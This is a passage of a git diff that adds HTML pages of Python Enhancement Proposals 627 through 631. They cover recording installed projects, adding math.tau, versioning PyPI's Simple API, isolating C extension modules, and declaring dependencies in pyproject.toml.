+
    +
  • There are too many ways to install projects and this makes interoperation difficult.
  • +
  • There is no API to get information on installed distributions.
  • +
+

The new document focuses only on the on-disk format of information about installed projects. Providing an API to install, uninstall or query this information is left to be implemented by tools.

+
+
+

Standard and Changes Process

+

The canonical standard for Recording installed projects (previously known as +Database of Installed Python Distributions) is the documentation at +packaging.python.org. +Any changes to the document (except trivial language or typography fixes) must +be made through the PEP process.

+

The document is normative (with examples to aid understanding). +PEPs that change it, such as this one, contain additional information that is +expected to get out of date, such as rationales and compatibility +considerations.

+

The proposed standard is submitted together with this PEP as a pull request to +packaging.python.org.

+
+
+

Changes and their Rationale

+
+

Renaming to “Recording installed projects”

+

The standard is renamed from Database of Installed Python Distributions +to Recording installed projects.

+

While putting files in known locations on disk may be thought of as +a “database”, it’s not what most people think about when they hear the term. +The PyPA links to PEP 376 under the heading Recording installed distributions.

+

The PyPA glossary defines “Distribution” (or, “Distribution Package” to prevent +confusion with e.g. Linux distributions) as “A versioned archive file […]”. +Since there may be other ways to install Python code than from archive files, +the document uses “installed project” rather than “installed distribution”.

+
+
+

Removal of Implementation Details

+

All tool- and library-specific details are removed. +The mechanisms of how a project is installed are also left out: the document +focuses on the end state. +One exception is a sketch of an uninstallation algorithm, +which is given to better explain the purpose of the RECORD file.

+

References to .egg-info and .egg, +formats specific to setuptools and distutils, +are left out.

+
+
+

Explicitly Allowing Additional Files

+

The .dist-info directory is allowed to contain files not specified in +the spec. +The current tools already do this.

+

A note in the specification mentions files in the .dist-info directory of wheels. +Current tools copy these files to the installed .dist-info—something +to keep in mind for further standardization efforts.

+
+
+

Clarifications in the RECORD File

+

The CSV dialect is specified to be the default of Python’s csv module. +This resolves edge cases around handling double-quotes and line terminators +in file names.

+

The “base” of relative paths in RECORD is specified relative to the +.dist-info directory, rather than tool-specific --install-lib and +--prefix options.

+

Both hash and size fields are now optional (for any file, not just .pyc, .pyo and RECORD). Leaving them out is discouraged, except for *.pyc and RECORD itself. (Note that PEP 376 is unclear on what was optional; when taken literally, its text and examples contradict each other. Despite that, "both fields are optional" is a reasonable interpretation of PEP 376. The alternative would be to mandate—rather than recommend—which files can be recorded without hash and size, and to update that list over time as new use cases come up.)

+

The new spec explicitly says that the RECORD file must now include all files of the installed project (the exception for .pyc files remains). Since tools use RECORD for uninstallation, incomplete file lists could introduce orphaned files to users' environments. On the other hand, this means that there is no way to record hashes of any files if the full list of files is unknown.

+

A sketch of an uninstallation algorithm is included to clarify the file’s +primary purpose and contents.

+

Tools must not uninstall/remove projects that lack a RECORD file +(unless they have external information, such as in system package +managers of Linux distros).

+

On Windows, files in RECORD may be separated by either / or \. PEP 376 was unclear on this: it mandates forward slashes in one place, but shows backslashes in a Windows-specific example.
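+
Taken together, these clarifications make RECORD straightforward to consume. The following sketch (the helper name is illustrative, and UTF-8 is an assumption here, since the encoding of RECORD is deliberately deferred by this PEP) reads the file with the csv module's default dialect and normalises Windows path separators:
+
import csv
+from pathlib import Path
+
+def iter_record(dist_info):
+    """Yield (path, hash, size) rows from a RECORD file."""
+    record = Path(dist_info) / "RECORD"
+    with open(record, newline="", encoding="utf-8") as f:
+        for path, file_hash, size in csv.reader(f):
+            path = path.replace("\\", "/")  # either separator is allowed on Windows
+            # hash and size are optional and may be empty strings
+            yield path, file_hash or None, int(size) if size else None
+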

+
+
+

Optional RECORD File

+

The RECORD file is made optional. +Not all tools can easily generate a list of installed files in a +Python-specific format.

+

Specifically, the RECORD file is unnecessary when projects are installed by a Linux system package manager, which has its own ways to keep track of files, uninstall them or check their integrity. Having to keep a RECORD file in sync with the disk and the system package database would be unreasonably fragile, and no RECORD file is better than one that does not correspond to reality.

+

(Full disclosure: The author of this PEP is an RPM packager active in the Fedora Linux distro.)

+
+
+

Optional INSTALLER File

+

The INSTALLER file is also made optional, and specified to be used for +informational purposes only. +It is still a single-line text file containing the name of the installer.

+

This file was originally added to distinguish projects installed by the Python +installer (pip) from ones installed by other package managers +(e.g. dnf). +There were attempts to use this file to prevent pip from updating or +uninstalling packages it didn’t install.

+

Our goal is supporting interoperating tools, and basing any action on +which tool happened to install a package runs counter to that goal.

+

Instead of relying on the installer name, tools should use feature detection. The current document offers a crude way of making a project untouchable by Python tooling: omitting the RECORD file.

+

On the other hand, the installer name may be useful in hints to the user.

+

To align with this new purpose of the file, the new specification allows +any ASCII string in INSTALLER, rather than a lowercase identifier. +It also suggests using the command-line command, if available.
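+
For example, a hypothetical installer called mytool might write the file as follows (the helper and tool name are illustrative only):
+
from pathlib import Path
+
+def write_installer_file(dist_info, tool="mytool"):
+    # A single line of ASCII text naming the installer; informational only.
+    Path(dist_info, "INSTALLER").write_text(tool + "\n", encoding="ascii")
+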

+
+
+

The REQUESTED File: Removed from Spec

+

The REQUESTED file is now considered a tool-specific extension.

+

Per PEP 376, REQUESTED was to be written when a project was installed +by direct user request, as opposed to automatically to satisfy dependencies +of another project. Projects without this marker file could be uninstalled +when no longer needed.

+

Despite the standard, many existing installers (including older versions of +pip) never write this file. There is no distinction between projects +that are “OK to remove when no longer needed” and ones simply installed by +a tool that ignores REQUESTED. So, the file is currently not usable for its +intended purpose (unless a tool can use additional, non-standard information).

+
+
+

Clarifications

+

When possible, terms (such as name and version) are qualified by +references to existing specs.

+
+
+
+

Deferred Ideas

+

To limit the scope of this PEP, some improvements are explicitly left to +future PEPs:

+
    +
  • Encoding of the RECORD file
  • +
  • Limiting or namespacing files that can appear in .dist-info
  • +
  • Marking the difference between projects installed directly by user request +versus those installed to satisfy dependencies, so that the latter can be +removed when no longer needed.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0627.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0628/index.html b/pep-0628/index.html
new file mode 100644
index 00000000000..6b07f866204
--- /dev/null
+++ b/pep-0628/index.html
@@ -0,0 +1,184 @@
PEP 628 – Add math.tau | peps.python.org
+
+


+ + +
+
+
+

PEP 628 – Add math.tau

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Jun-2011
+
Python-Version:
+
3.6
+
Post-History:
+
28-Jun-2011
+
+
+
+
+
+

Abstract

+

In honour of Tau Day 2011, this PEP proposes the addition of the circle +constant math.tau to the Python standard library.

+

The concept of tau (τ) is based on the observation that the ratio of a circle's circumference to its radius is far more fundamental and interesting than the ratio between its circumference and diameter. It is simply a matter of assigning a name to the value 2 * pi.

+
+
+

PEP Acceptance

+

This PEP is now accepted and math.tau will be a part of Python 3.6. +Happy birthday Alyssa!

+

The idea in this PEP has been implemented in the auspiciously named +issue 12345.

+
+
+

The Rationale for Tau

+

pi is defined as the ratio of a circle’s circumference to its diameter. +However, a circle is defined by its centre point and its radius. This is +shown clearly when we note that the parameter of integration to go from a +circle’s circumference to its area is the radius, not the diameter. If we +use the diameter instead we have to divide by four to get rid of the +extraneous multiplier.

+

When working with radians, it is trivial to convert any given fraction of a +circle to a value in radians in terms of tau. A quarter circle is +tau/4, a half circle is tau/2, seven 25ths is 7*tau/25, etc. In +contrast with the equivalent expressions in terms of pi (pi/2, pi, +14*pi/25), the unnecessary and needlessly confusing multiplication by +two is gone.
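+
Since math.tau shipped in Python 3.6, the comparison is easy to check directly:
+
import math
+
+quarter_circle = math.tau / 4      # instead of math.pi / 2
+half_circle = math.tau / 2         # instead of math.pi
+seven_25ths = 7 * math.tau / 25    # instead of 14 * math.pi / 25
+
+print(math.tau == 2 * math.pi)     # True
+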

+
+
+

Other Resources

+

I’ve barely skimmed the surface of the many examples put forward to point out +just how much easier and more sensible many aspects of mathematics become +when conceived in terms of tau rather than pi. If you don’t find my +specific examples sufficiently persuasive, here are some more resources that +may be of interest:

+
    +
  • Michael Hartl is the primary instigator of Tau Day in his Tau Manifesto
  • +
  • Bob Palais, the author of the original mathematics journal article +highlighting the problems with pi has a page of resources on the +topic
  • +
  • For those that prefer videos to written text, Pi is wrong! and +Pi is (still) wrong are available on YouTube
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0628.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0629/index.html b/pep-0629/index.html
new file mode 100644
index 00000000000..51676510b62
--- /dev/null
+++ b/pep-0629/index.html
@@ -0,0 +1,255 @@
PEP 629 – Versioning PyPI's Simple API | peps.python.org
+
+


+ + +
+
+
+

PEP 629 – Versioning PyPI’s Simple API

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
16-Jul-2020
+
Post-History:
+
16-Jul-2020
+
+
+
+
+
+

Note

+

This PEP was accepted on 2020-08-20. PyPI merged an implementation on 2021-01-28, marking this PEP as "Final".

+
+
+

Abstract

+

This PEP proposes adding a method for versioning the simple API so that clients can determine which features of the simple API a specific repository supports.

+
+
+

Rationale

+

When evolving the simple API, clients wish to be able to determine +which features the repository supports. Currently there is no +mechanism to do this, except by attempting to detect new features +by looking at the data in the responses and see if it appears like +a particular feature is in use.

+

This works reasonably well for a modern version of a client determining whether the repository supports all of the features it wants to implement; however, it does nothing to tell an older version of the client that the repository supports features it might not understand, nor to allow messaging to indicate that it might not be correctly understanding the output of the repository.

+

An example of a scenario where this happened was the phasing in of python-requires metadata: while existing clients could still successfully use the repository, they lacked the ability to understand this new piece of data, which would have informed their behavior in selecting a better file for end users.

+
+
+

Overview

+

This PEP proposes the inclusion of a meta tag on the responses of every successful request to a simple API page, which contains a name attribute of "pypi:repository-version", and a content attribute that is a PEP 440-compatible version number, further constrained to ONLY be Major.Minor, with none of the additional features supported by PEP 440.

+

This would end up looking like:

+
<meta name="pypi:repository-version" content="1.0">
+
+
+

When interpreting the repository version:

+
    +
  • Incrementing the major version is used to signal a backwards +incompatible change such that existing clients would no longer be +expected to be able to meaningfully use the API.
  • +
  • Incrementing the minor version is used to signal a backwards +compatible change such that existing clients would still be +expected to be able to meaningfully use the API.
  • +
+

It is left up to the discretion of any future PEPs as to what +specifically constitutes a backwards incompatible vs compatible change +beyond the broad suggestion that existing clients will be able to +“meaningfully” continue to use the API, and can include adding, +modifying, or removing existing features.

+

It is the expectation of this PEP that the major version will never be incremented, and any future major API evolutions would utilize a different mechanism for API evolution. However, the major version is included to disambiguate from future versions (e.g. a hypothetical simple API v2 that lived at /v2/, which would be confusing if the repository-version were set to a version >= 2).

+

This PEP sets the current API version to “1.0”, and expects that +future PEPs that further evolve the simple API will increment the +minor version number.

+
+

Clients

+

Clients interacting with the simple API SHOULD introspect each +response for the repository version, and if that data does not exist +MUST assume that it is version 1.0.

+

When encountering a major version greater than expected, clients +MUST hard fail with an appropriate error message for the user.

+

When encountering a minor version greater than expected, clients +SHOULD warn users with an appropriate message.

+

Clients MAY still continue to use feature detection in order to +determine what features a repository uses.
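+
A client-side sketch of these rules (a regular expression is used for brevity; a real client would likely use a proper HTML parser):
+
import re
+
+SUPPORTED = (1, 0)  # the version this hypothetical client understands
+
+def check_repository_version(html):
+    match = re.search(
+        r'<meta name="pypi:repository-version" content="(\d+)\.(\d+)">', html)
+    # If the tag is absent, version 1.0 MUST be assumed.
+    major, minor = map(int, match.groups()) if match else (1, 0)
+    if major > SUPPORTED[0]:
+        raise RuntimeError(f"unsupported repository version {major}.{minor}")
+    if (major, minor) > SUPPORTED:
+        print(f"warning: repository version {major}.{minor} is newer than expected")
+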

+
+
+
+

Rejected Ideas

+
+

Using a Header

+

Instead of baking this information into the actual HTML, an alternative would be to use an HTTP header. This idea was considered and ultimately rejected because it would require mirrors to start modifying headers, instead of being able to operate as a "dumb" HTTP server of files.

+
+
+

Using a URL

+

Another traditional mechanism for versioning APIs is to bake it into the URL, something like /1.0/simple/ or so. This works well for major version changes where older clients are not expected to be capable of continuing to use it, but it is not well suited to minor version bumps, particularly when the version numbers can be viewed as largely advisory for end users.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0629.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0630/index.html b/pep-0630/index.html
new file mode 100644
index 00000000000..e3f8b12bd8d
--- /dev/null
+++ b/pep-0630/index.html
@@ -0,0 +1,713 @@
PEP 630 – Isolating Extension Modules | peps.python.org
+
+


+ + +
+
+
+

PEP 630 – Isolating Extension Modules

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Capi-SIG list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
25-Aug-2020
+
Post-History:
+
16-Jul-2020
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Isolating Extension Modules HOWTO.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Traditionally, state belonging to Python extension modules was kept in C +static variables, which have process-wide scope. This document +describes problems of such per-process state and efforts to make +per-module state—a better default—possible and easy to use.

+

The document also describes how to switch to per-module state where +possible. This transition involves allocating space for that state, potentially +switching from static types to heap types, and—perhaps most +importantly—accessing per-module state from code.

+
+
+

About This Document

+

As an informational PEP, +this document does not introduce any changes; those should be done in +their own PEPs (or issues, if small enough). Rather, it covers the +motivation behind an effort that spans multiple releases, and instructs +early adopters on how to use the finished features.

+

Once support is reasonably complete, this content can be moved to Python’s +documentation as a HOWTO. +Meanwhile, in the spirit of documentation-driven development, +gaps identified in this PEP can show where to focus the effort, +and it can be updated as new features are implemented.

+

Whenever this PEP mentions extension modules, the advice also +applies to built-in modules.

+
+

Note

+

This PEP contains generic advice. When following it, always take into +account the specifics of your project.

+

For example, while much of this advice applies to the C parts of +Python’s standard library, the PEP does not factor in stdlib specifics +(unusual backward compatibility issues, access to private API, etc.).

+
+

PEPs related to this effort are:

+
    +
  • PEP 384Defining a Stable ABI, which added a C API for creating +heap types
  • +
  • PEP 489Multi-phase extension module initialization
  • +
  • PEP 573Module State Access from C Extension Methods
  • +
+

This document is concerned with Python’s public C API, which is not +offered by all implementations of Python. However, nothing in this PEP is +specific to CPython.

+

As with any Informational PEP, this text does not necessarily represent +a Python community consensus or recommendation.

+
+
+

Motivation

+

An interpreter is the context in which Python code runs. It contains +configuration (e.g. the import path) and runtime state (e.g. the set of +imported modules).

+

Python supports running multiple interpreters in one process. There are +two cases to think about—users may run interpreters:

+
    +
  • in sequence, with several Py_InitializeEx/Py_FinalizeEx +cycles, and
  • +
  • in parallel, managing “sub-interpreters” using +Py_NewInterpreter/Py_EndInterpreter.
  • +
+

Both cases (and combinations of them) would be most useful when +embedding Python within a library. Libraries generally shouldn’t make +assumptions about the application that uses them, which includes +assuming a process-wide “main Python interpreter”.

+

Currently, CPython doesn’t handle this use case well. Many extension +modules (and even some stdlib modules) use per-process global state, +because C static variables are extremely easy to use. Thus, data +that should be specific to an interpreter ends up being shared between +interpreters. Unless the extension developer is careful, it is very easy +to introduce edge cases that lead to crashes when a module is loaded in +more than one interpreter in the same process.

+

Unfortunately, per-interpreter state is not easy to achieve—extension +authors tend to not keep multiple interpreters in mind when developing, +and it is currently cumbersome to test the behavior.

+
+
+

Rationale for Per-module State

+

Instead of focusing on per-interpreter state, Python’s C API is evolving +to better support the more granular per-module state. By default, +C-level data will be attached to a module object. Each interpreter +will then create its own module object, keeping the data separate. For +testing the isolation, multiple module objects corresponding to a single +extension can even be loaded in a single interpreter.

+

Per-module state provides an easy way to think about lifetime and +resource ownership: the extension module will initialize when a +module object is created, and clean up when it’s freed. In this regard, +a module is just like any other PyObject *; there are no “on +interpreter shutdown” hooks to think—or forget—about.

+
+

Goal: Easy-to-Use Module State

+

It is currently cumbersome or impossible to do everything the C API +offers while keeping modules isolated. Enabled by PEP 384, changes in +PEP 489 and PEP 573 (and future planned ones) aim to first make it +possible to build modules this way, and then to make it easy to +write new modules this way and to convert old ones, so that it can +become a natural default.

+

Even if per-module state becomes the default, there will be use cases +for different levels of encapsulation: per-process, per-interpreter, +per-thread or per-task state. The goal is to treat these as exceptional +cases: they should be possible, but extension authors will need to +think more carefully about them.

+
+
+

Non-goals: Speedups and the GIL

+

There is some effort to speed up CPython on multi-core CPUs by making the GIL +per-interpreter. While isolating interpreters helps that effort, +defaulting to per-module state will be beneficial even if no speedup is +achieved, as it makes supporting multiple interpreters safer by default.

+
+
+
+

Making Modules Safe with Multiple Interpreters

+

There are many ways to correctly support multiple interpreters in +extension modules. The rest of this text describes the preferred way to +write such a module, or to convert an existing one.

+

Note that support is a work in progress; the API for some features your +module needs might not yet be ready.

+

A full example module is available as +xxlimited.

+

This section assumes that “you” are an extension module author.

+
+

Isolated Module Objects

+

The key point to keep in mind when developing an extension module is +that several module objects can be created from a single shared library. +For example:

+
>>> import sys
+>>> import binascii
+>>> old_binascii = binascii
+>>> del sys.modules['binascii']
+>>> import binascii  # create a new module object
+>>> old_binascii == binascii
+False
+
+
+

As a rule of thumb, the two modules should be completely independent. +All objects and state specific to the module should be encapsulated +within the module object, not shared with other module objects, and +cleaned up when the module object is deallocated. Exceptions are +possible (see Managing Global State), but they will need more +thought and attention to edge cases than code that follows this rule of +thumb.

+

While some modules could do with less stringent restrictions, isolated +modules make it easier to set clear expectations (and guidelines) that +work across a variety of use cases.

+
+
+

Surprising Edge Cases

+

Note that isolated modules do create some surprising edge cases. Most +notably, each module object will typically not share its classes and +exceptions with other similar modules. Continuing from the +example above, +note that old_binascii.Error and binascii.Error are +separate objects. In the following code, the exception is not caught:

+
>>> old_binascii.Error == binascii.Error
+False
+>>> try:
+...     old_binascii.unhexlify(b'qwertyuiop')
+... except binascii.Error:
+...     print('boo')
+...
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+binascii.Error: Non-hexadecimal digit found
+
+
+

This is expected. Notice that pure-Python modules behave the same way: +it is a part of how Python works.

+

The goal is to make extension modules safe at the C level, not to make +hacks behave intuitively. Mutating sys.modules “manually” counts +as a hack.

+
+
+

Managing Global State

+

Sometimes, state of a Python module is not specific to that module, but +to the entire process (or something else “more global” than a module). +For example:

+
    +
  • The readline module manages the terminal.
  • +
  • A module running on a circuit board wants to control the on-board +LED.
  • +
+

In these cases, the Python module should provide access to the global +state, rather than own it. If possible, write the module so that +multiple copies of it can access the state independently (along with +other libraries, whether for Python or other languages).

+

If that is not possible, consider explicit locking.

+

If it is necessary to use process-global state, the simplest way to +avoid issues with multiple interpreters is to explicitly prevent a +module from being loaded more than once per process—see +Opt-Out: Limiting to One Module Object per Process.

+
+
+

Managing Per-Module State

+

To use per-module state, use multi-phase extension module initialization +introduced in PEP 489. This signals that your module supports multiple +interpreters correctly.

+

Set PyModuleDef.m_size to a positive number to request that many +bytes of storage local to the module. Usually, this will be set to the +size of some module-specific struct, which can store all of the +module’s C-level state. In particular, it is where you should put +pointers to classes (including exceptions, but excluding static types) +and settings (e.g. csv’s field_size_limit) +which the C code needs to function.

+
+

Note

+

Another option is to store state in the module’s __dict__, +but you must avoid crashing when users modify __dict__ from +Python code. This means error- and type-checking at the C level, +which is easy to get wrong and hard to test sufficiently.

+
+

If the module state includes PyObject pointers, the module object +must hold references to those objects and implement the module-level hooks +m_traverse, m_clear and m_free. These work like +tp_traverse, tp_clear and tp_free of a class. Adding them will +require some work and make the code longer; this is the price for +modules which can be unloaded cleanly.

+

An example of a module with per-module state is currently available as +xxlimited; +example module initialization shown at the bottom of the file.

+
+
+

Opt-Out: Limiting to One Module Object per Process

+

A non-negative PyModuleDef.m_size signals that a module supports +multiple interpreters correctly. If this is not yet the case for your +module, you can explicitly make your module loadable only once per +process. For example:

+
static int loaded = 0;
+
+static int
+exec_module(PyObject* module)
+{
+    if (loaded) {
+        PyErr_SetString(PyExc_ImportError,
+                        "cannot load module more than once per process");
+        return -1;
+    }
+    loaded = 1;
+    // ... rest of initialization
+}
+
+
+
+
+

Module State Access from Functions

+

Accessing the state from module-level functions is straightforward. +Functions get the module object as their first argument; for extracting +the state, you can use PyModule_GetState:

+
static PyObject *
+func(PyObject *module, PyObject *args)
+{
+    my_struct *state = (my_struct*)PyModule_GetState(module);
+    if (state == NULL) {
+        return NULL;
+    }
+    // ... rest of logic
+}
+
+
+
+

Note

+

PyModule_GetState may return NULL without setting an +exception if there is no module state, i.e. PyModuleDef.m_size was +zero. In your own module, you’re in control of m_size, so this is +easy to prevent.

+
+
+
+
+

Heap Types

+

Traditionally, types defined in C code are static; that is, +static PyTypeObject structures defined directly in code and +initialized using PyType_Ready().

+

Such types are necessarily shared across the process. Sharing them +between module objects requires paying attention to any state they own +or access. To limit the possible issues, static types are immutable at +the Python level: for example, you can’t set str.myattribute = 123.

+
+

Note

+

Sharing truly immutable objects between interpreters is fine, +as long as they don’t provide access to mutable objects. +However, in CPython, every Python object has a mutable implementation +detail: the reference count. Changes to the refcount are guarded by the GIL. +Thus, code that shares any Python objects across interpreters implicitly +depends on CPython’s current, process-wide GIL.

+
+

Because they are immutable and process-global, static types cannot access +“their” module state. +If any method of such a type requires access to module state, +the type must be converted to a heap-allocated type, or heap type +for short. These correspond more closely to classes created by Python’s +class statement.

+

For new modules, using heap types by default is a good rule of thumb.

+

Static types can be converted to heap types, but note that +the heap type API was not designed for “lossless” conversion +from static types – that is, creating a type that works exactly like a given +static type. Unlike static types, heap type objects are mutable by default. +Also, when rewriting the class definition in a new API, +you are likely to unintentionally change a few details (e.g. pickle-ability +or inherited slots). Always test the details that are important to you.

+
+

Defining Heap Types

+

Heap types can be created by filling a PyType_Spec structure, a +description or “blueprint” of a class, and calling +PyType_FromModuleAndSpec() to construct a new class object.

+
+

Note

+

Other functions, like PyType_FromSpec(), can also create +heap types, but PyType_FromModuleAndSpec() associates the module +with the class, allowing access to the module state from methods.

+
+

The class should generally be stored in both the module state (for +safe access from C) and the module’s __dict__ (for access from +Python code).

+
+
+

Garbage Collection Protocol

+

Instances of heap types hold a reference to their type. +This ensures that the type isn’t destroyed before all its instances are, +but may result in reference cycles that need to be broken by the +garbage collector.

+

To avoid memory leaks, instances of heap types must implement the +garbage collection protocol. +That is, heap types should:

+
    +
  • Have the Py_TPFLAGS_HAVE_GC flag.
  • +
  • Define a traverse function using Py_tp_traverse, which +visits the type (e.g. using Py_VISIT(Py_TYPE(self));).
  • +
+

Please refer to the documentation of Py_TPFLAGS_HAVE_GC and tp_traverse (https://docs.python.org/3/c-api/typeobj.html#c.PyTypeObject.tp_traverse) for additional considerations.

+

If your traverse function delegates to the tp_traverse of its base class (or another type), ensure that Py_TYPE(self) is visited only once. Note that only heap types are expected to visit the type in tp_traverse.

+

For example, if your traverse function includes:

+
base->tp_traverse(self, visit, arg)
+
+
+

…and base may be a static type, then it should also include:

+
if (base->tp_flags & Py_TPFLAGS_HEAPTYPE) {
+    // a heap type's tp_traverse already visited Py_TYPE(self)
+} else {
+    Py_VISIT(Py_TYPE(self));
+}
+
+
+

It is not necessary to handle the type’s reference count in tp_new +and tp_clear.

+
+
+

Module State Access from Classes

+

If you have a type object defined with PyType_FromModuleAndSpec(), +you can call PyType_GetModule to get the associated module, and then +PyModule_GetState to get the module’s state.

+

To save some tedious error-handling boilerplate code, you can combine these two steps with PyType_GetModuleState, resulting in:

+
my_struct *state = (my_struct*)PyType_GetModuleState(type);
+if (state == NULL) {
+    return NULL;
+}
+
+
+
+
+

Module State Access from Regular Methods

+

Accessing the module-level state from methods of a class is somewhat more +complicated, but is possible thanks to the changes introduced in PEP 573. +To get the state, you need to first get the defining class, and then +get the module state from it.

+

The largest roadblock is getting the class a method was defined in, or +that method’s “defining class” for short. The defining class can have a +reference to the module it is part of.

+

Do not confuse the defining class with Py_TYPE(self). If the method is called on a subclass of your type, Py_TYPE(self) will refer to that subclass, which may be defined in a different module than yours.

+
+

Note

+

The following Python code can illustrate the concept. +Base.get_defining_class returns Base even +if type(self) == Sub:

+
class Base:
+    def get_defining_class(self):
+        return __class__
+
+class Sub(Base):
+    pass
+
+
+
+

For a method to get its “defining class”, it must use the +METH_METHOD | METH_FASTCALL | METH_KEYWORDS calling convention +and the corresponding PyCMethod signature:

+
PyObject *PyCMethod(
+    PyObject *self,               // object the method was called on
+    PyTypeObject *defining_class, // defining class
+    PyObject *const *args,        // C array of arguments
+    Py_ssize_t nargs,             // length of "args"
+    PyObject *kwnames)            // NULL, or dict of keyword arguments
+
+
+

Once you have the defining class, call PyType_GetModuleState to get +the state of its associated module.

+

For example:

+
static PyObject *
+example_method(PyObject *self,
+        PyTypeObject *defining_class,
+        PyObject *const *args,
+        Py_ssize_t nargs,
+        PyObject *kwnames)
+{
+    my_struct *state = (my_struct*)PyType_GetModuleState(defining_class);
+    if (state == NULL) {
+        return NULL;
+    }
+    ... // rest of logic
+}
+
+PyDoc_STRVAR(example_method_doc, "...");
+
+static PyMethodDef my_methods[] = {
+    {"example_method",
+      (PyCFunction)(void(*)(void))example_method,
+      METH_METHOD|METH_FASTCALL|METH_KEYWORDS,
+      example_method_doc}
+    {NULL},
+}
+
+
+
+
+

Module State Access from Slot Methods, Getters and Setters

+
+

Note

+

This is new in Python 3.11.

+
+

Slot methods – the fast C equivalents for special methods, such as nb_add +for __add__ or tp_new +for initialization – have a very simple API that doesn’t allow +passing in the defining class, unlike with PyCMethod. +The same goes for getters and setters defined with +PyGetSetDef.

+

To access the module state in these cases, use the PyType_GetModuleByDef +function, and pass in the module definition. +Once you have the module, call PyModule_GetState +to get the state:

+
PyObject *module = PyType_GetModuleByDef(Py_TYPE(self), &module_def);
+my_struct *state = (my_struct*)PyModule_GetState(module);
+if (state == NULL) {
+    return NULL;
+}
+
+
+

PyType_GetModuleByDef works by searching the MRO +(i.e. all superclasses) for the first superclass that has a corresponding +module.

+
+

Note

+

In very exotic cases (inheritance chains spanning multiple modules +created from the same definition), PyType_GetModuleByDef might not +return the module of the true defining class. However, it will always +return a module with the same definition, ensuring a compatible +C memory layout.

+
+
+
+

Lifetime of the Module State

+

When a module object is garbage-collected, its module state is freed. +For each pointer to (a part of) the module state, you must hold a reference +to the module object.

+

Usually this is not an issue, because types created with +PyType_FromModuleAndSpec, and their instances, hold a reference +to the module. +However, you must be careful in reference counting when you reference +module state from other places, such as callbacks for external +libraries.

+
+
+
+

Open Issues

+

Several issues around per-module state and heap types are still open.

+

Discussions about improving the situation are best held on the capi-sig +mailing list.

+
+

Type Checking

+

Currently (as of Python 3.10), heap types have no good API to write +Py*_Check functions (like PyUnicode_Check exists for str, a +static type), and so it is not easy to ensure that instances have a +particular C layout.

+
+
+

Metaclasses

+

Currently (as of Python 3.10), there is no good API to specify the +metaclass of a heap type; that is, the ob_type field of the type +object.

+
+
+

Per-Class Scope

+

It is also not possible to attach state to types. While +PyHeapTypeObject is a variable-size object (PyVarObject), +its variable-size storage is currently consumed by slots. Fixing this +is complicated by the fact that several classes in an inheritance +hierarchy may need to reserve some state.

+
+
+

Lossless Conversion to Heap Types

+

The heap type API was not designed for “lossless” conversion from static types; +that is, creating a type that works exactly like a given static type. +The best way to address it would probably be to write a guide that covers +known “gotchas”.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0630.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0631/index.html b/pep-0631/index.html
new file mode 100644
index 00000000000..ddef0a0bbe1
--- /dev/null
+++ b/pep-0631/index.html
@@ -0,0 +1,361 @@
PEP 631 – Dependency specification in pyproject.toml based on PEP 508 | peps.python.org
+
+


+ + +
+
+
+

PEP 631 – Dependency specification in pyproject.toml based on PEP 508

+
+
Author:
+
Ofek Lev <ofekmeister at gmail.com>
+
Sponsor:
+
Paul Ganssle <paul at ganssle.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
20-Aug-2020
+
Post-History:
+
20-Aug-2020
+
Superseded-By:
+
621
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies how to write a project’s dependencies in a +pyproject.toml file for packaging-related tools to consume +using the fields defined in PEP 621.

+
+

Note

+

This PEP has been accepted and was merged into PEP 621.

+
+
+
+

Entries

+

All dependency entries MUST be valid PEP 508 strings.

+

Build backends SHOULD abort at load time for any parsing errors.

+
from packaging.requirements import InvalidRequirement, Requirement
+
+...
+
+try:
+    Requirement(entry)
+except InvalidRequirement:
+    # exit
+
+
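For illustration, this is how such a check behaves on one valid and one invalid entry (the entry strings here are hypothetical; only packaging.requirements is assumed, as above):

+
from packaging.requirements import InvalidRequirement, Requirement
+
+print(Requirement('requests[security] < 3'))  # a valid PEP 508 string; parses fine
+
+try:
+    Requirement('requests >>> 3')  # '>>>' is not a valid version operator
+except InvalidRequirement as exc:
+    print(f'aborting build: {exc}')
+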
+
+
+

Specification

+
+

dependencies

+
    +
  • Format: array of strings
  • +
  • Related core metadata: Requires-Dist
  • +
+

Every element MUST be an entry.

+
[project]
+dependencies = [
+  'PyYAML ~= 5.0',
+  'requests[security] < 3',
+  'subprocess32; python_version < "3.2"',
+]
+
+
+
+
+

optional-dependencies

+ +

Each key is the name of the provided option, with each value being the same type as +the dependencies field, i.e. an array of strings.

+
[project.optional-dependencies]
+tests = [
+  'coverage>=5.0.3',
+  'pytest',
+  'pytest-benchmark[histogram]>=3.2.1',
+]
+
+
+
+
+
+

Example

+

This is a real-world example port of what docker-compose defines.

+
[project]
+dependencies = [
+  'cached-property >= 1.2.0, < 2',
+  'distro >= 1.5.0, < 2',
+  'docker[ssh] >= 4.2.2, < 5',
+  'dockerpty >= 0.4.1, < 1',
+  'docopt >= 0.6.1, < 1',
+  'jsonschema >= 2.5.1, < 4',
